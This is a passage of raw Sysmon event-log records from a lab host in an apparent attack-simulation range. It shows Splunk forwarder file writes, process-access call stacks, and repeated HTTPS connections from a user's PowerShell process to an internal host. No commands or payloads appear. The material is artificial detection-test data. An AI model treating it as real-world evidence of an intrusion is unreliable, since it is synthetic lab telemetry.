Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4EC65F928BC5337EABE6BED070C3CF1B,SHA256=CD3EBD7ACFCA6A61C11F943A187D12AAE66BC3D627B6DDCC2B27F59D1B67E7CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:09.316{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA41D86D9CD0BC0A2A6C58F3C37C976B,SHA256=549DD1DA8438EE4F346D904AF9A61257C8CF52D0EF5DC922763DC6E402F7A980,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:09.316{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF20CB1D7D0A82340CC5DAA744251FB6,SHA256=92FA13308D117BDDCA454878BF794B40328FC0CA411A923A5451CC6BD443EB91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.927{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50410-false10.0.1.12-8000- 23542300x800000000000000036496470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:10.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D72B47FB7B37FC5C1122999F40847E9F,SHA256=7BF66ED2D7D80AA00014D38DDC9898DD61A3C0A25767CD776112EC396B22A9C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:40.027{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50411-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:11.373{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2299F9F60276CFAE11AFA6CA76FAC69,SHA256=1BCFFA9EB56C58ACEBB4E33D4B90050E7194C850634F4E5C0D62D736C4D6279B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:12.403{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03EF6BE93B768A473DF671F838F2C2E9,SHA256=EC33B4527C11E2A79148D54189242BAC8E40EC891993FEA02FBBF1D9A96BE95D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:13.433{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90889BEA0ECFB0E4FFE4236604972DCD,SHA256=8B4E53A465742A850AC8F2A11858F0FBE3305B3ABD7D27FA128F2AD42F7FF16B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:14.451{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E713858F5E431367C808899FE419F9C8,SHA256=6014AD582FBD98418F3B54D251C3B755DEBE3F4F7C761F09B1A3B6E99C3BFB37,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:15.485{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3D4579282DDCDA3DDF580AE8F3AAB38E,SHA256=8336CEA5C7FA87C303ED2B0506FA23D452DA5FF4654E522FAAFDBFE1FF768590,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:44.913{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50412-false10.0.1.12-8000- 23542300x800000000000000036496475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:15.469{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1396C0341D265B45A21B9FD238C9336C,SHA256=3B2AEF446FAD620D5973465E1C228651B9667262EE44341E39BD81E9F6463737,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:46.033{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50413-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:16.484{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCE6A2E6C2A23DE12F6977514A8A51A3,SHA256=0E40C7D18B2C34A251E4EED36204256473049382E67735CD103CFACF0513FCEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:17.498{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55ECD28033F7839461C1050C0FA4D587,SHA256=7ACD8D10135709753C7AF68B16075629B0C3241A333A54CEEAEBC300CC80293A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:18.529{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CFE5944501FD297BCE5458978CC5DEF,SHA256=ADE70FFC1266A2EAAE22B4D3F107786AAB4046416454AAAF12AC634D83255885,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:19.581{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921ABAFBB861AE64A223E122587FF490,SHA256=7E4E8B01D1784C79677479D7B000CCB887C0DF969CE19978A2EB92941943D48E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:19.381{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E1B92DEDBE7D261F69DC8DA741CA3639,SHA256=A3E3E9BBA638CA9840DD0F5CD53C3606B2581482875F20AFB0B2B297451CA26D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:50.047{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50414-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:20.611{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAC8F98A36601E67B7BA74153CF5DE4C,SHA256=68AC84D11777CCB77B4EE539DE0B19671F659046E1D9F326B1FB62C5A1FDCA04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:21.678{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=802AFB72D55DC739EC81B50501DB9456,SHA256=09194FC3B6EC17166C394C3334F2447870B624CE1DC4E4A3F1F5688B6727D184,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:50.907{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50415-false10.0.1.12-8000- 23542300x800000000000000036496488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:22.693{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED1D46501AAF8DCB8C59C9884841B01,SHA256=4AD040FF68D4A518497E678E5F63B9DCC690F2FE828DB44F1CC8B70118CCFB7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:23.723{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=158134CC58CF7D39F1226A0A7A4C66BB,SHA256=39F38ED4957A0903C04307F4E0850A976CA7FD8CC3F93254603D19D58D3D380E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:23.208{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4C2A55E4F1A44961F76B64E076441459,SHA256=E3258DB278662BFCF406EBD3C2BB88FC6C265B3736EDEBC5BA486098100F238F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.747{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FB8-6140-5C56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.747{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.747{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.747{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.747{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.747{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-9FB8-6140-5C56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.747{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FB8-6140-5C56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.742{B81B27B7-9FB8-6140-5C56-04000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.746{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F2F43E0D93F8562568AEEAD034EE12F,SHA256=666266D5B624F1935B9FB2300DD275647CCB874824ACEB0F1D5D760C44592EDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.545{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=74675A750CC296C185AA1913FAAD2682,SHA256=2370B2FF5E3989A2EEA267E9EB4504F9AB0B6EF28D3CF0597F0A92C7D91C5F5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.307{B81B27B7-9FB8-6140-5B56-04000000C801}29086400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.145{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FB8-6140-5B56-04000000C801}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.143{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.143{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:24.143{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 